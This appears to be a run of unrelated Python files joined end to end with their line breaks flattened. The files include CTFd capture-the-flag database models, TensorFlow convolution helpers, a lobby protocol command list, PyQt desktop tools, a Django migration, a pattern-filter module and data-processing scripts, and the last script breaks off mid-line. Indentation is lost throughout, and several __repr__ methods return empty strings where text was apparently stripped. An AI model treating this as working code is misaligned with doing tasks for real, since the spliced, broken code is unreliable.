CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.content)) def __init__(self, *args, **kwargs): super(Notifications, self).__init__(**kwargs) class Pages(db.Model): __tablename__ = "pages" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String(80)) route = db.Column(db.String(128), unique=True) content = db.Column(db.Text) draft = db.Column(db.Boolean) hidden = db.Column(db.Boolean) auth_required = db.Column(db.Boolean) # TODO: Use hidden attribute files = db.relationship("PageFiles", backref="page") def __init__(self, *args, **kwargs): super(Pages, self).__init__(**kwargs) def __repr__(self): return "".format(self.route) class Challenges(db.Model): __tablename__ = "challenges" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(80)) description = db.Column(db.Text) max_attempts = db.Column(db.Integer, default=0) type = db.Column(db.String(80)) state = db.Column(db.String(80), nullable=False, default="visible") requirements = db.Column(db.JSON) author_id = db.Column(db.Integer, 
db.ForeignKey("users.id", ondelete="CASCADE")) files = db.relationship("ChallengeFiles", backref="challenge") resources = db.relationship("Resources", backref="challenge") tags = db.relationship("Tags", secondary="tag_challenge") flags = db.relationship("Flags", backref="challenge") comments = db.relationship("ChallengeComments", backref="challenge") author = db.relationship("Users", foreign_keys="Challenges.author_id", lazy="select") class alt_defaultdict(defaultdict): """ This slightly modified defaultdict is intended to allow SQLAlchemy to not fail when querying Challenges that contain a missing challenge type. e.g. Challenges.query.all() should not fail if `type` is `a_missing_type` """ def __missing__(self, key): return self["standard"] __mapper_args__ = { "polymorphic_identity": "standard", "polymorphic_on": type, "_polymorphic_map": alt_defaultdict(), } @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.description)) def __init__(self, *args, **kwargs): super(Challenges, self).__init__(**kwargs) def __repr__(self): return "" % self.name class Resources(db.Model): __tablename__ = "resources" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) content = db.Column(db.Text) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} @property def name(self): return "Resource {id}".format(id=self.id) @property def category(self): return self.__tablename__ @property def description(self): return "Resource for {name}".format(name=self.challenge.name) @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.content)) def __init__(self, *args, **kwargs): super(Resources, self).__init__(**kwargs) def __repr__(self): return "" % self.content class Tags(db.Model): __tablename__ = "tags" id = db.Column(db.Integer, primary_key=True) value = db.Column(db.String(80)) exercise = db.Column(db.Boolean) challenges = db.relationship("Challenges", secondary="tag_challenge") def __init__(self, *args, **kwargs): super(Tags, self).__init__(**kwargs) class TagChallenge(db.Model): __tablename__ = "tag_challenge" challenge_id = db.Column(db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE"), primary_key=True, nullable=False) tag_id = db.Column(db.Integer, db.ForeignKey("tags.id", ondelete="CASCADE"), primary_key=True, nullable=False) def __init__(self, *args, **kwargs): super(TagChallenge, self).__init__(**kwargs) class Files(db.Model): __tablename__ = "files" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") location = db.Column(db.Text) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} def __init__(self, *args, **kwargs): super(Files, self).__init__(**kwargs) def __repr__(self): return "".format( type=self.type, location=self.location ) class ChallengeFiles(Files): __mapper_args__ = {"polymorphic_identity": "challenge"} challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) def __init__(self, *args, **kwargs): super(ChallengeFiles, self).__init__(**kwargs) class PageFiles(Files): __mapper_args__ = {"polymorphic_identity": "page"} page_id = db.Column(db.Integer, db.ForeignKey("pages.id")) def __init__(self, *args, **kwargs): super(PageFiles, self).__init__(**kwargs) 
class Flags(db.Model): __tablename__ = "flags" id = db.Column(db.Integer, primary_key=True) challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) type = db.Column(db.String(80)) content = db.Column(db.Text) data = db.Column(db.Text) __mapper_args__ = {"polymorphic_on": type} def __init__(self, *args, **kwargs): super(Flags, self).__init__(**kwargs) def __repr__(self): return "".format(self.content, self.challenge_id) class Users(db.Model): __tablename__ = "users" __table_args__ = (db.UniqueConstraint("id"), {}) # Core attributes id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(128), unique=True) password = db.Column(db.String(128)) email = db.Column(db.String(128), unique=True) type = db.Column(db.String(80)) secret = db.Column(db.String(128)) # Supplementary attributes website = db.Column(db.String(128)) country = db.Column(db.String(32)) school = db.Column(db.String(32)) cursus = db.Column(db.String(128)) specialisation = db.Column(db.String(128)) bracket = db.Column(db.String(32)) hidden = db.Column(db.Boolean, default=False) banned = db.Column(db.Boolean, default=False) verified = db.Column(db.Boolean, default=False) field_entries = db.relationship( "UserFieldEntries", foreign_keys="UserFieldEntries.user_id", lazy="joined" ) created = db.Column(db.DateTime, default=datetime.datetime.utcnow) __mapper_args__ = {"polymorphic_identity": "user", "polymorphic_on": type} def __init__(self, **kwargs): super(Users, self).__init__(**kwargs) @validates("password") def validate_password(self, key, plaintext): from CTFd.utils.crypto import hash_password return hash_password(str(plaintext)) @hybrid_property def account_id(self): return self.id @hybrid_property def account(self): return self @property def fields(self): return self.get_fields(admin=False) @property def solves(self): return self.get_solves() @property def fails(self): return self.get_fails() def get_fields(self, admin=False): if admin: return self.field_entries return [ entry for entry in self.field_entries if entry.field.public and entry.value ] def get_solves(self): solves = Solves.query.filter_by(user_id=self.id) return solves.all() def get_fails(self): fails = Fails.query.filter_by(user_id=self.id) return fails.all() class Admins(Users): __tablename__ = "admins" __mapper_args__ = {"polymorphic_identity": "admin"} class Contributors(Users): __tablename__ = "contributors" __mapper_args__ = {"polymorphic_identity": "contributor"} class Teachers(Users): __tablename__ = "teachers" __mapper_args__ = {"polymorphic_identity": "teacher"} class Submissions(db.Model): __tablename__ = "submissions" id = db.Column(db.Integer, primary_key=True) challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) ip = db.Column(db.String(46)) provided = db.Column(db.Text) type = db.Column(db.String(32)) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) # Relationships user = db.relationship("Users", foreign_keys="Submissions.user_id", lazy="select") challenge = db.relationship( "Challenges", foreign_keys="Submissions.challenge_id", lazy="select" ) __mapper_args__ = {"polymorphic_on": type} @hybrid_property def account_id(self): return self.user_id @hybrid_property def account(self): return self.user @staticmethod def get_child(type): child_classes = { x.polymorphic_identity: x.class_ for x in Submissions.__mapper__.self_and_descendants } return child_classes[type] def 
__repr__(self): return f"" class Solves(Submissions): __tablename__ = "solves" __table_args__ = ( db.UniqueConstraint("challenge_id", "user_id"), {}, ) id = db.Column( None, db.ForeignKey("submissions.id", ondelete="CASCADE"), primary_key=True ) challenge_id = column_property( db.Column(db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE")), Submissions.challenge_id, ) user_id = column_property( db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")), Submissions.user_id, ) user = db.relationship("Users", foreign_keys="Solves.user_id", lazy="select") challenge = db.relationship( "Challenges", foreign_keys="Solves.challenge_id", lazy="select" ) __mapper_args__ = {"polymorphic_identity": "correct"} class Fails(Submissions): __mapper_args__ = {"polymorphic_identity": "incorrect"} class Tracking(db.Model): __tablename__ = "tracking" id = db.Column(db.Integer, primary_key=True) ip = db.Column(db.String(46)) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) user = db.relationship("Users", foreign_keys="Tracking.user_id", lazy="select") def __init__(self, *args, **kwargs): super(Tracking, self).__init__(**kwargs) def __repr__(self): return "" % self.ip class Configs(db.Model): __tablename__ = "config" id = db.Column(db.Integer, primary_key=True) key = db.Column(db.Text) value = db.Column(db.Text) def __init__(self, *args, **kwargs): super(Configs, self).__init__(**kwargs) class Tokens(db.Model): __tablename__ = "tokens" id = db.Column(db.Integer, primary_key=True) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) created = db.Column(db.DateTime, default=datetime.datetime.utcnow) expiration = db.Column( db.DateTime, default=lambda: datetime.datetime.utcnow() + datetime.timedelta(days=30), ) value = db.Column(db.String(128), unique=True) user = db.relationship("Users", foreign_keys="Tokens.user_id", lazy="select") def __init__(self, *args, **kwargs): super(Tokens, self).__init__(**kwargs) def __repr__(self): return "" % self.id class UserTokens(Tokens): __mapper_args__ = {"polymorphic_identity": "user"} class Comments(db.Model): __tablename__ = "comments" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") content = db.Column(db.Text) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) author_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) author = db.relationship("Users", foreign_keys="Comments.author_id", lazy="select") @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.content, sanitize=True)) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} class ChallengeComments(Comments): __mapper_args__ = {"polymorphic_identity": "challenge"} challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) class UserComments(Comments): __mapper_args__ = {"polymorphic_identity": "user"} user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) class PageComments(Comments): __mapper_args__ = {"polymorphic_identity": "page"} page_id = db.Column(db.Integer, db.ForeignKey("pages.id", ondelete="CASCADE")) class Fields(db.Model): __tablename__ = "fields" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.Text) type = db.Column(db.String(80), default="standard") field_type = db.Column(db.String(80)) description = 
db.Column(db.Text) required = db.Column(db.Boolean, default=False) public = db.Column(db.Boolean, default=False) editable = db.Column(db.Boolean, default=False) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} class UserFields(Fields): __mapper_args__ = {"polymorphic_identity": "user"} class FieldEntries(db.Model): __tablename__ = "field_entries" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") value = db.Column(db.JSON) field_id = db.Column(db.Integer, db.ForeignKey("fields.id", ondelete="CASCADE")) field = db.relationship( "Fields", foreign_keys="FieldEntries.field_id", lazy="joined" ) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} @hybrid_property def name(self): return self.field.name @hybrid_property def description(self): return self.field.description class UserFieldEntries(FieldEntries): __mapper_args__ = {"polymorphic_identity": "user"} user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) user = db.relationship("Users", foreign_keys="UserFieldEntries.user_id") class Rights(db.Model): __tablename__ = "rights" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.Text) def __init__(self, *args, **kwargs): super(Rights, self).__init__(**kwargs) class Roles(db.Model): __tablename__ = "roles" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.Text) def __init__(self, *args, **kwargs): super(Roles, self).__init__(**kwargs) class RoleRights(db.Model): __tablename__ = "role_rights" role_id = db.Column(db.Integer, db.ForeignKey("roles.id", ondelete="CASCADE"), primary_key=True, nullable=False) right_id = db.Column(db.Integer, db.ForeignKey("rights.id", ondelete="CASCADE"), primary_key=True, nullable=False) def __init__(self, *args, **kwargs): super(RoleRights, self).__init__(**kwargs) class UserRights(db.Model): __tablename__ = "user_rights" user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE"), primary_key=True, nullable=False) right_id = db.Column(db.Integer, db.ForeignKey("rights.id", ondelete="CASCADE"), primary_key=True, nullable=False) def __init__(self, *args, **kwargs): super(UserRights, self).__init__(**kwargs) 10-100 import tensorflow as tf weight_decay=1e-4 def relu(x, name='relu6'): return tf.nn.relu6(x, name) def batch_norm(x, momentum=0.9, epsilon=1e-5, train=True, name='bn'): return tf.layers.batch_normalization(x, momentum=momentum, epsilon=epsilon, scale=True, training=train, name=name) def conv2d(input_, output_dim, k_h, k_w, d_h, d_w, stddev=0.02, name='conv2d', bias=False): with tf.variable_scope(name): w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=stddev)) conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME') if bias: biases = tf.get_variable('bias', [output_dim], initializer=tf.constant_initializer(0.0)) conv = tf.nn.bias_add(conv, biases) return conv def conv2d_block(input, out_dim, k, s, is_train, name): with tf.name_scope(name), tf.variable_scope(name): net = conv2d(input, out_dim, k, k, s, s, name='conv2d') net = batch_norm(net, train=is_train, name='bn') net = relu(net) return net def conv_1x1(input, output_dim, name, bias=False): with tf.name_scope(name): return conv2d(input, output_dim, 1,1,1,1, stddev=0.02, name=name, bias=bias) def pwise_block(input, output_dim, is_train, name, bias=False): with tf.name_scope(name), 
tf.variable_scope(name): out=conv_1x1(input, output_dim, bias=bias, name='pwb') out=batch_norm(out, train=is_train, name='bn') out=relu(out) return out def dwise_conv(input, k_h=3, k_w=3, channel_multiplier= 1, strides=[1,1,1,1], padding='SAME', stddev=0.02, name='dwise_conv', bias=False): with tf.variable_scope(name): in_channel=input.get_shape().as_list()[-1] w = tf.get_variable('w', [k_h, k_w, in_channel, channel_multiplier], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=stddev)) conv = tf.nn.depthwise_conv2d(input, w, strides, padding, rate=None,name=None,data_format=None) if bias: biases = tf.get_variable('bias', [in_channel*channel_multiplier], initializer=tf.constant_initializer(0.0)) conv = tf.nn.bias_add(conv, biases) return conv def res_block(input, expansion_ratio, output_dim, stride, is_train, name, bias=False, shortcut=True): with tf.name_scope(name), tf.variable_scope(name): # pw bottleneck_dim=round(expansion_ratio*input.get_shape().as_list()[-1]) net = conv_1x1(input, bottleneck_dim, name='pw', bias=bias) net = batch_norm(net, train=is_train, name='pw_bn') net = relu(net) # dw net = dwise_conv(net, strides=[1, stride, stride, 1], name='dw', bias=bias) net = batch_norm(net, train=is_train, name='dw_bn') net = relu(net) # pw & linear net = conv_1x1(net, output_dim, name='pw_linear', bias=bias) net = batch_norm(net, train=is_train, name='pw_linear_bn') # element wise add, only for stride==1 if shortcut and stride == 1: in_dim=int(input.get_shape().as_list()[-1]) if in_dim != output_dim: ins=conv_1x1(input, output_dim, name='ex_dim') net=ins+net else: net=input+net return net def separable_conv(input, k_size, output_dim, stride, pad='SAME', channel_multiplier=1, name='sep_conv', bias=False): with tf.name_scope(name), tf.variable_scope(name): in_channel = input.get_shape().as_list()[-1] dwise_filter = tf.get_variable('dw', [k_size, k_size, in_channel, channel_multiplier], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=0.02)) pwise_filter = tf.get_variable('pw', [1, 1, in_channel*channel_multiplier, output_dim], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=0.02)) strides = [1,stride, stride,1] conv=tf.nn.separable_conv2d(input,dwise_filter,pwise_filter,strides,padding=pad, name=name) if bias: biases = tf.get_variable('bias', [output_dim],initializer=tf.constant_initializer(0.0)) conv = tf.nn.bias_add(conv, biases) return conv def global_avg(x): with tf.name_scope('global_avg'): net=tf.layers.average_pooling2d(x, x.get_shape()[1:-1], 1) return net def flatten(x): #flattened=tf.reshape(input,[x.get_shape().as_list()[0], -1]) # or, tf.layers.flatten(x) return tf.contrib.layers.flatten(x) def pad2d(inputs, pad=(0, 0), mode='CONSTANT'): paddings = [[0, 0], [pad[0], pad[0]], [pad[1], pad[1]], [0, 0]] net = tf.pad(inputs, paddings, mode=mode) return netTurBoss/tasbot3 """Lists of all currently documented lobby protocol commands. 
Extraced from ProtocolDescription.xml with bibim's perl script (see scripts/) """ client = ( 'ADDBOT', 'ADDSTARTRECT', 'CHANGEPASSWORD', 'CHANNELS', 'CHANNELTOPIC', 'CONFIRMAGREEMENT', 'DISABLEUNITS', 'ENABLEALLUNITS', 'ENABLEUNITS', 'FORCEALLYNO', 'FORCELEAVECHANNEL', 'FORCESPECTATORMODE', 'FORCETEAMCOLOR', 'FORCETEAMNO', 'HANDICAP', 'JOIN', 'JOINBATTLE', 'JOINBATTLEACCEPT', 'JOINBATTLEDENY', 'KICKFROMBATTLE', 'LEAVE', 'LEAVEBATTLE', 'LOGIN', 'MUTELIST', 'MYBATTLESTATUS', 'MYSTATUS', 'OPENBATTLE', 'PING', 'PROPERTIESDEFINE', 'PROPERTIESGET', 'PROPERTIESLISTEN', 'PROPERTIESSET', 'REGISTER', 'REMOVEBOT', 'REMOVESCRIPTTAGS', 'REMOVESTARTRECT', 'RENAMEACCOUNT', 'RING', 'SAY', 'SAYBATTLE', 'SAYBATTLEEX', 'SAYEX', 'SAYPRIVATE', 'SCRIPT', 'SCRIPTEND', 'SCRIPTSTART', 'SETSCRIPTTAGS', 'TESTLOGIN', 'UPDATEBATTLEINFO', 'UPDATEBOT', 'USERID' ) server = ( 'ACCEPTED', 'ACQUIREUSERID', 'ADDBOT', 'ADDSTARTRECT', 'ADDUSER', 'AGREEMENT', 'AGREEMENTEND', 'BATTLECLOSED', 'BATTLEOPENED', 'BROADCAST', 'CHANNEL', 'CHANNELMESSAGE', 'CHANNELTOPIC', 'CLIENTBATTLESTATUS', 'CLIENTIPPORT', 'CLIENTS', 'CLIENTSTATUS', 'DENIED', 'DISABLEUNITS', 'ENABLEALLUNITS', 'ENABLEUNITS', 'ENDOFCHANNELS', 'FORCELEAVECHANNEL', 'FORCEQUITBATTLE', 'HOSTPORT', 'JOIN', 'JOINBATTLE', 'JOINBATTLEFAILED', 'JOINBATTLEREQUEST', 'JOINED', 'JOINEDBATTLE', 'JOINFAILED', 'LEFT', 'LEFTBATTLE', 'LOGININFOEND', 'MOTD', 'MUTELIST', 'MUTELISTBEGIN', 'MUTELISTEND', 'OFFERFILE', 'OPENBATTLE', 'OPENBATTLEFAILED', 'PONG', 'PROPERTIESVALUES', 'REDIRECT', 'REGISTRATIONACCEPTED', 'REGISTRATIONDENIED', 'REMOVEBOT', 'REMOVESCRIPTTAGS', 'REMOVESTARTRECT', 'REMOVEUSER', 'REQUESTBATTLESTATUS', 'REQUESTUPDATEFILE', 'RING', 'SAID', 'SAIDBATTLE', 'SAIDBATTLEEX', 'SAIDEX', 'SAIDPRIVATE', 'SAYPRIVATE', 'SCRIPT', 'SCRIPTEND', 'SCRIPTSTART', 'SERVERMSG', 'SERVERMSGBOX', 'SETSCRIPTTAGS', 'TASSERVER', 'TESTLOGINACCEPT', 'TESTLOGINDENY', 'UDPSOURCEPORT', 'UPDATEBATTLEINFO', 'UPDATEBOT') hard-gists/2477361/snippet.py10-100 #!/usr/bin/env python """ If you use landslide to create slideshows using markdown, you may have found yourself repeating endlessly: + save source document + switch to the terminal to run landslide + reload the generated html in your browser This QT (using webkit) based "application" monitor changes to the source file and automatically regenerates the HTML and refreshes the "browser". $ ./qtkit.py --help usage: qtkit.py [-h] --landslide LANDSLIDE [--port PORT] [--html HTML] file landslide text to html viewer positional arguments: file text file (md or rst) optional arguments: -h, --help show this help message and exit --landslide LANDSLIDE path to the landslide binary --port PORT simple http server port (default 8000) --html HTML html filename (default presentation.html) To quit close the QT window or press ctrl + c in the terminal. 
""" import sys import os import signal import subprocess import SimpleHTTPServer import SocketServer from multiprocessing import Process import argparse from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * class FullHelpArgumentParser(argparse.ArgumentParser): """ argument parser displaying the complete help on error """ # http://stackoverflow.com/a/4042861/753565 def error(self, message): sys.stderr.write('error: %s\n' % message) self.print_help() sys.exit(2) def parse_arguments(): """ argparse wrapper """ parser = FullHelpArgumentParser(description='landslide text to html viewer') parser.add_argument('file', help='text file (md or rst)', action='store') parser.add_argument('--landslide', help='path to the landslide binary', action='store', required=True) parser.add_argument('--port', type=int, help='simple http server port (default 8000)', default=8000, action='store') parser.add_argument('--html', help='html filename (default presentation.html)', default='presentation.html', action='store') return parser.parse_args() def http_server(path, port): """ start a simple http server listening on port serving files from path """ os.chdir(path) handler = SimpleHTTPServer.SimpleHTTPRequestHandler # http://stackoverflow.com/questions/337115/setting-time-wait-tcp SocketServer.TCPServer.allow_reuse_address = True http = SocketServer.TCPServer(('', port), handler) # handling a ctrl-c termination try: http.serve_forever() except KeyboardInterrupt: pass def landslide(args): """ run args.landslide on args.file to create args.html """ html_file = os.path.join(os.path.dirname(args.file), args.html) subprocess.call([args.landslide, '--embed', args.file, '-d', html_file]) def start_fs_watcher(web, args): """ create a watcher on args.file, calling landslide and reloading web """ # http://stackoverflow.com/a/5339877/753565 @pyqtSlot(str) def file_changed(path): landslide(args) web.reload() fs_watcher = QFileSystemWatcher([args.file]) fs_watcher.connect(fs_watcher, SIGNAL('fileChanged(QString)'), file_changed) return fs_watcher def main(): args = parse_arguments() # using multiprocessing to start the http server in its own process http = Process(target=http_server, args=(os.path.dirname(args.file), args.port)) http.start() app = QApplication([]) web = QWebView() fs_watcher = start_fs_watcher(web, args) # compare html and text file last modified dates to only process if necessary mtime_text_file = os.path.getmtime(args.file) try: mtime_html_file = os.path.getmtime(os.path.join(os.path.dirname(args.file), args.html)) except OSError: mtime_html_file = 0 if mtime_text_file > mtime_html_file: landslide(args) web.load(QUrl('http://localhost:%i/%s' % (args.port, args.html))) web.show() # exiting from the command line (ctrl+c) signal.signal(signal.SIGINT, signal.SIG_DFL) # starting the QT event loop app.exec_() # del fs_watcher in a cleanup slot connected to the aboutToQuit signal doesn't work del fs_watcher http.terminate() if __name__ == '__main__': main()# Generated by Django 2.2 on 2019-04-07 10:43 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('userprofile', '0001_initial'), ] operations = [ migrations.AddField( model_name='doctormodel', name='is_approved_by_admin', field=models.BooleanField(default=False), ), migrations.AddField( model_name='patientmodel', name='is_open_for_appointment', field=models.BooleanField(default=True), ), ] import sys from PyQt5.QtWidgets import * from PyQt5.QtGui import * from PyQt5.QtCore import Qt import 
sqlite3 import main connection = sqlite3.connect("hezarfendata.db") cursor = connection.cursor() class seraKapak(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Sera Kapağı") self.setWindowIcon(QIcon("icons/serakapak.ico")) self.setGeometry(600,350,600,450) self.setFixedSize(self.size())#kullanıcı pencereyi büyültemez küçültemez self.UI() self.show() def UI(self): self.setStyleSheet("background-color:white") main_layout = QVBoxLayout() topFrame = QFrame(self) topFrame.setStyleSheet("background-color:white") top_layout = QHBoxLayout(topFrame) bottomFrame = QFrame(self) bottom_layout = QFormLayout(bottomFrame) bottomFrame.setStyleSheet("font:15pt Times Bold;background-color:#fcc324") img_book = QLabel(topFrame) img = QPixmap("icons/automationps.png") img_book.setPixmap(img) lbl_title = QLabel("Sera Kapağı",topFrame) lbl_title.setStyleSheet("color:#003f8a;font:25pt Times Bold") top_layout.addStretch() top_layout.addWidget(img_book) top_layout.addWidget(lbl_title) top_layout.addStretch() main_layout.addWidget(topFrame) ###############bottom frame DESİGN################## self.sera_kapağı_tarih_entry = QLineEdit(bottomFrame) self.sera_kapağı_tarih_entry.setPlaceholderText("Tarih") self.sera_kapağı_tarih_entry.setStyleSheet("background-color:white") self.sera_kapak_durum_entry = QLineEdit(bottomFrame) self.sera_kapak_durum_entry.setPlaceholderText("Açık/Kapalı") self.sera_kapak_durum_entry.setStyleSheet("background-color:white") sera_kapak_durum_add_button = QPushButton("Ekle",bottomFrame) sera_kapak_durum_add_button.clicked.connect(self.seraKapakpage) bottom_layout.addRow(QLabel("Tarih Giriniz :"),self.sera_kapağı_tarih_entry) bottom_layout.addRow(QLabel("Durum Giriniz Açık/Kapalı :"),self.sera_kapak_durum_entry) bottom_layout.addRow(QLabel(""),sera_kapak_durum_add_button) main_layout.addWidget(bottomFrame) self.setLayout(main_layout) def seraKapakpage(self): tarih = self.sera_kapağı_tarih_entry.text() serakapakdurum = self.sera_kapak_durum_entry.text() if (tarih and serakapakdurum != ""): try: query = "INSERT INTO 'seradurum' (tarih,durum) VALUES (?,?)" cursor.execute(query,(tarih,serakapakdurum)) connection.commit() self.sera_kapağı_tarih_entry.setText("") self.sera_kapak_durum_entry.setText("") QMessageBox.information(self,"Sera Kapağı","Sera Kapak Durumu eklendi") except: QMessageBox.information(self, "Uyarı!", "Sera Kapak Durumu Eklenemedi") else: QMessageBox.information(self, "Uyarı!", "Alanlar Boş kalamaz")"""Simple Filter support""" import re import fnmatch class BaseFilter(object): """Filter a string based on a list of regular expression or glob patterns. This should be inherited and the __call__ overriden with a real implementation """ __slots__ = ("patterns", "_re_options") def __init__(self, patterns, case_insensitive=True): self.patterns = list(patterns) if case_insensitive: self._re_options = re.M | re.U | re.I else: self._re_options = re.M | re.U def add_glob(self, glob): """Add a glob pattern to this filter Internally all globs are converted to regular expressions using `fnmatch.translate()` :param glob: glob pattern to add :type glob: str """ self.patterns.append(fnmatch.translate(glob)) def add_regex(self, regex): """Add a regular expression pattern to this filter :param regex: regular expression pattern to add to this filter. :type regex: str """ self.patterns.append(regex) def __call__(self, item): """Run this filter - return True if filtered and False otherwise. 
:param item: item to check against this filter :type item: str """ raise NotImplementedError() def __repr__(self): return self.__class__.__name__ + "(patterns=%r)" % self.patterns class IncludeFilter(BaseFilter): """Include only objects that match *all* assigned filters""" def __call__(self, item): for _pattern in self.patterns: if re.match(_pattern, item, self._re_options) is not None: return False return True class ExcludeFilter(BaseFilter): """Exclude objects that match any filter""" def __call__(self, item): for _pattern in self.patterns: if re.match(_pattern, item, self._re_options) is not None: return True return False def exclude_glob(*pattern): """Create an exclusion filter from a glob pattern""" result = [] for pat in pattern: result.append(fnmatch.translate(pat)) return ExcludeFilter(result) def include_glob(*pattern): """Create an inclusion filter from glob patterns""" result = [] for pat in pattern: result.append(fnmatch.translate(pat)) return IncludeFilter(result) def include_glob_qualified(*pattern): """Create an inclusion filter from glob patterns Additionally ensure the pattern is for a qualified table name. If not '.' is found in the name, this implies an implicit *. before the name """ result = [] for pat in pattern: if "." not in pat: pat = "*." + pat result.append(pat) return include_glob(*result) def exclude_glob_qualified(*pattern): """Create an exclusion filter from glob patterns Additionally ensure the pattern is for a qualified table name. If not '.' is found in the name, this implies an implicit *. before the name """ result = [] for pat in pattern: if "." not in pat: pat = "*." + pat result.append(pat) return exclude_glob(*result) matteoarru/PROKEX-K-Fit # -*- coding: utf-8 -*- """ Created on Fri Jan 19 09:50:42 2018 @author: matte """ text1=["poor", "management"] text2=["good", "management"] text3=["people", "management"] text4=["management"] import difflib seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text2)).ratio()*100 print (seq) seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text3)).ratio()*100 print (seq) seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text4)).ratio()*100 print (seq) seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text1)).ratio()*100 print (seq)import wandb DATA_URL = "https://data.keithito.com/data/speech/LJSpeech-1.1.tar.bz2" def register_data(url=DATA_URL): run = wandb.init(job_type="register-data") data_artifact = wandb.Artifact("ljs-tarball", type="raw data") data_artifact.add_reference(url, name="tarball") run.log_artifact(data_artifact) if __name__ == "__main__": register_data() #! /usr/bin/python3 # -*- coding: utf-8 -*- #-------------------------------------------------------------------------------------------------- # Script to count words and their cooccurrences # # Usage: # count_cooccurrences.py [--data_prefix str] [--language str] # (It reads the standard input and makes files in the data directory.) # # Example: # $ bzcat enwiki-tokenized.tsv.bz2 | # ./count_cooccurrences.py --data_prefix enwiki --language en # $ bzcat jawiki-tokenized.tsv.bz2 | # ./count_cooccurrences.py --data_prefix jawiki --language ja # # Copyright 2020 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file # except in compliance with the License. 
You may obtain a copy of the License at # https://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software distributed under the # License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific language governing permissions # and limitations under the License. #-------------------------------------------------------------------------------------------------- import logging import math import operator import os import regex import struct import sys import time import tkrzw import tkrzw_dict MAX_SENTENCES_PER_DOC = 64 SCORE_DECAY = 0.95 SENTENCE_GAP_PENALTY = 0.5 WINDOW_SIZE = 20 #BATCH_MAX_WORDS = 5000000 # for 1GB RAM usage BATCH_MAX_WORDS = 100000000 # for 10GB RAM usage BATCH_CUTOFF_FREQ = 4 MIN_WORD_COUNT_IN_BATCH = 16 MIN_COOC_COUNT_IN_BATCH = 4 MAX_COOC_PER_WORD = 256 MERGE_DB_UNIT = 16 PROB_CACHE_CAPACITY = 50000 logger = tkrzw_dict.GetLogger() class WordCountBatch: def __init__(self, data_prefix, language): self.data_prefix = data_prefix self.language = language self.num_batches = 0 def Run(self): start_time = time.time() logger.info("Process started: data_prefix={}, language={}".format( self.data_prefix, self.language)) self.Start() num_documents, num_sentences, num_words = 0, 0, 0 for line in sys.stdin: line = line.strip() sentences = line.split("\t") if not sentences: continue sentences = sentences[:MAX_SENTENCES_PER_DOC] num_documents += 1 num_sentences += len(sentences) document = [] for sentence in sentences: sentence = sentence.lower() words = sentence.split(" ") num_words += len(words) document.append(words) if num_documents % 100 == 0: logger.info( "Processing: documents={}, sentences={}, words={}, RSS={:.2f}MB".format( num_documents, num_sentences, num_words, tkrzw.Utility.GetMemoryUsage() / 1024.0 / 1024)) self.FeedDocument(document) self.Finish(num_sentences) logger.info( "Process done: documents={}, sentences={}, words={}, elapsed_time={:.2f}s".format( num_documents, num_sentences, num_words, time.time() - start_time)) def Start(self): self.mem_word_count = 